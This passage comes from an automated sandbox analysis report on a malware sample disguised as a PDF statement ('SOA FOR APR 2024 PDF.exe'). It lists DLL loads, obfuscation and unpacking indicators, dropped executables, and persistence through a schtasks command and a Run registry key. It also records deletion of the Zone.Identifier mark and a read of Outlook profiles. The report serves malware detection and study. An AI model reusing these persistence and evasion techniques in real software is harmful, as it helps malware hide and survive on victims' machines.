                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    .NET source code contains potential unpacker
                    Source: SOA FOR APR 2024 PDF.exe, SpreadsheetName.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: eeBIYZL.exe.0.dr, SpreadsheetName.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, URqoV1LhkZEcr5B7SE.cs.Net Code: hfPd2Vxtwp System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 0_2_04F4EAB8 pushfd ; iretd 0_2_04F4EB31
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F0F04E push eax; retf 054Ah9_2_00F0F085
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F006E8 push eax; ret 9_2_00F00702
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F006A1 push eax; ret 9_2_00F006A2
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F006AF push eax; ret 9_2_00F006B2
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F00728 push eax; ret 9_2_00F00732
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F00718 push eax; ret 9_2_00F00722
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F00C95 push edi; retf 9_2_00F00C3A
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_00F00C3D push edi; ret 9_2_00F00CC2
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_067A1658 push cs; retf 9_2_067A165B
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_067A7350 push esp; iretd 9_2_067A7359
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 9_2_067A7F75 push esp; iretd 9_2_067A7F7D
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C6EFA3 push eax; retf 0586h14_2_02C6F085
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C606EC push eax; ret 14_2_02C60702
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C60708 push eax; ret 14_2_02C60712
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C60718 push eax; ret 14_2_02C60722
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C60728 push eax; ret 14_2_02C60732
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_02C60C3D push edi; ret 14_2_02C60CC2
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06B66418 push esp; iretd 14_2_06B66421
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06B61658 push cs; retf 14_2_06B6165B
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 14_2_06B6BB21 push es; ret 14_2_06B6BB30
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E70728 push eax; ret 20_2_01E70732
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E70708 push eax; ret 20_2_01E70712
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E70718 push eax; ret 20_2_01E70722
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E706FD push eax; ret 20_2_01E70702
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E70698 push eax; ret 20_2_01E70712
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E70698 push eax; ret 20_2_01E70722
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E7AA28 pushfd ; iretd 20_2_01E7AA29
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_01E70C3D push edi; ret 20_2_01E70CC2
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_07036F82 push es; ret 20_2_07036F90
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_07031658 push cs; retf 20_2_0703165B
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: section name: .text entropy: 7.967897552415294
                    Source: eeBIYZL.exe.0.drStatic PE information: section name: .text entropy: 7.967897552415294
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, hBijZRtWbDg84TdWNq.csHigh entropy of concatenated method names: 'ov4IVCptsm', 'zmvI9rpna9', 'OeZI1oGcSi', 'lLuIlx4Vpa', 'oUTIQcV7ZX', 'GxpIaFfR5l', 'Pv0I0PU0PT', 'SoKIRtIe18', 'DvnIose5b3', 'e1kIiUEQ6r'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, nSGl4eGucR0b01PKM2.csHigh entropy of concatenated method names: 'WXHBnuyybp', 'fywB3tMBSB', 'Yg3B2YHWLI', 'cvdBbFm4gc', 'etRBg8nwek', 'nP3BJYLK6X', 'KsHBEDX9Eb', 'YqdBV66Zfu', 'y3XB9Fp8Hf', 'on4BUkF53m'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, e5FEW7AFJ6dV89uR7F.csHigh entropy of concatenated method names: 'e7MP152K9m', 'oe3Plk447J', 'KBTPSA8Dqw', 'UX4PQekxg4', 'PXUPkoWxR3', 'p3hPangacC', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, CjieVEhOcdajCk6j0r.csHigh entropy of concatenated method names: 'RGn2YqtMH', 'kRcbhmNvp', 'XySJ34TGf', 'ub2EiLRjK', 'kww9Emxov', 'OOYUaLnG1', 'pJRrvfHGd5mhTF131v', 'l6cGSymQnbUAult0pc', 'aH5PTiJd9', 'XuIeGmLwV'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, vwucTM9lKq0PYnrVYH.csHigh entropy of concatenated method names: 'fD4qbBLYFE', 'rb2qJox4lN', 'rfhqVgh1FU', 'ywAq9FUwjP', 'HiXq5SZTGn', 'hLwqDeoLgB', 'F79qf6jH51', 'qhUqP84URw', 'jY3qpRIFUd', 'Gbuqer4Abv'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, wXATugk9wSyYEyEcyL.csHigh entropy of concatenated method names: 'ki95oNPO2y', 'C4B5wNaEfh', 'ant5kCRcOp', 'CrE5ygnGgF', 'z1v5lO9Frj', 'ISu5SSXAQO', 'lSp5QcvId3', 'd3J5a5wDPu', 'FIk54bFNev', 'W6Y50xABqS'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, oBEhsVWmimMw51DsPZ.csHigh entropy of concatenated method names: 'WdnPHh6HkO', 'h9rPxKMAtC', 'BfIPqHWSL9', 'GsdP6BlwOS', 'elJPNEgQOk', 'qpkPBJFOxr', 'A56PLbPfmK', 'nFBPO5ciS7', 'Ku4PK9ES2j', 'dMmPCZ03Ge'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, gVZTkpuMgvv3J2liIu2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'R28ekRDJ8h', 'nRueyx0HrO', 'ri8eFnxmjV', 'NfnejD4kpQ', 'FWTecAHTNT', 'yjLes9Gbnb', 'mkYe8F9caS'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, XdQUJK0UCO08Hh8mUb.csHigh entropy of concatenated method names: 'PYEBHCkfUQ', 'pcqBqD7OlZ', 'fxjBNuPpwP', 'fi2NrPwhtB', 'iApNz7dT9f', 'CMgBvggC4o', 'isLBuV22Sq', 'LMxBh0fwP9', 'PveBMOPXyi', 'TVZBdjZB5J'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, URqoV1LhkZEcr5B7SE.csHigh entropy of concatenated method names: 'phPMTUihDx', 'XgCMH5hZde', 'Hd8MxTnosL', 'ARYMqvb1pU', 'LYYM62n0ND', 'BmMMNPAbpt', 'JaZMBE9cfw', 'eF2MLL0IYw', 'FuRMOUewZH', 'QBhMKN4vS8'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, AdTDBmj5wP70ngiXNI.csHigh entropy of concatenated method names: 'aSVfKkoiKR', 'EkXfCBYoSe', 'ToString', 'AkwfHZUh3M', 'bUvfxmkI0m', 'niIfqu4Fpi', 'AE1f6Vsogk', 'mgufNTAVh2', 'ngifBOvbPB', 'OFlfLJufDC'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, ThpHiExuyr2n0yOge1.csHigh entropy of concatenated method names: 'Dispose', 'objuA7LoIC', 'BxnhlGEw4g', 'GLQYYPLywa', 'yIBurEhsVm', 'OmMuzw51Ds', 'ProcessDialogKey', 'qZThv5FEW7', 'SJ6hudV89u', 'M7Fhhft7PC'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, OcGry4VRIcmlRjnwWl.csHigh entropy of concatenated method names: 'hE3xkfSqiV', 'K4NxyS1HGd', 'cSoxF8pCP2', 'nmPxjZroo7', 'vSsxcOKXaq', 'GV6xssSJTd', 'm3yx8XuEIT', 'OtyxW6sB2n', 'MMaxALMMr4', 'hJSxrReRLZ'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, juuVQB19vvI7AaggOJ.csHigh entropy of concatenated method names: 'WBVNTSxm3w', 'TYXNxlnSka', 'P1QN6AiHXn', 'nRBNBi4sQE', 'H3yNLfG2Kx', 'jLE6cN0t6E', 'QUd6sU03yf', 'AVh68GrVNR', 'Wm76WafQhX', 'DBF6A1m18I'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, pakpIkuu8VRoyYfqsJC.csHigh entropy of concatenated method names: 'ToString', 'RpoeMotCXm', 'tPded1cSFq', 'eKoeTw9l5u', 'Q4teHKZfkT', 'pZBexFjVWY', 'cWmeqFCAlJ', 'NO4e6tg1yf', 'p0PxvWvIHSCxXqGYRsg', 'K6V8ujvBa03FjtCLjNM'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, rlr5Oauv8vspKmK80PT.csHigh entropy of concatenated method names: 'R9epnLj0ui', 'gvRp3Tjxrr', 'zCUp2ZFBcy', 'K3ppbQJHZW', 'ONwpgPMK9g', 'jdXpJPYNye', 'ycGpE4bHfY', 'UoLpVbAJWt', 'ahFp96d3qP', 'lUrpUJcGgO'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, fTCZTvdpopkx5bgW8E.csHigh entropy of concatenated method names: 'HViuBcGry4', 'MIcuLmlRjn', 'dlKuKq0PYn', 'YVYuCHotXG', 'KuIu58IBuu', 'DQBuD9vvI7', 'BFQFZ75QDDoYGMMP4e', 'z4TWNSa5EUOckZyZa0', 'Jf8uu18f21', 'bPquMIkW1Y'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, qt7PC3rIs2mV3uwCpY.csHigh entropy of concatenated method names: 'kvwpuhPK1w', 'QfcpMK2EnD', 'vSCpdWI9SB', 'efupHtYVff', 'GLTpxQnJgM', 'srIp6gR7x0', 'SFEpNAaEyG', 'ystP8KdQor', 'SnTPWjBFJ9', 'YaiPABnT5n'
                    Source: 0.2.SOA FOR APR 2024 PDF.exe.475f6b0.8.raw.unpack, tBds93ssCpjlCvnUZq.csHigh entropy of concatenated method names: 'QHefWWXPuw', 'FxCfrOhduE', 'NbtPvedrYa', 'iaaPu9e3do', 'mM0fi5mwXZ', 'DUjfwyS2U9', 'kGPftMxx5x', 'Nu1fkTjVTB', 'aO9fywsnGo', 'l8QfFn2TgU'
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeJump to dropped file
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile created: C:\Users\user\AppData\Roaming\eeBIYZL.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp"
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJteJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJteJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeFile opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeFile opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | delete
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
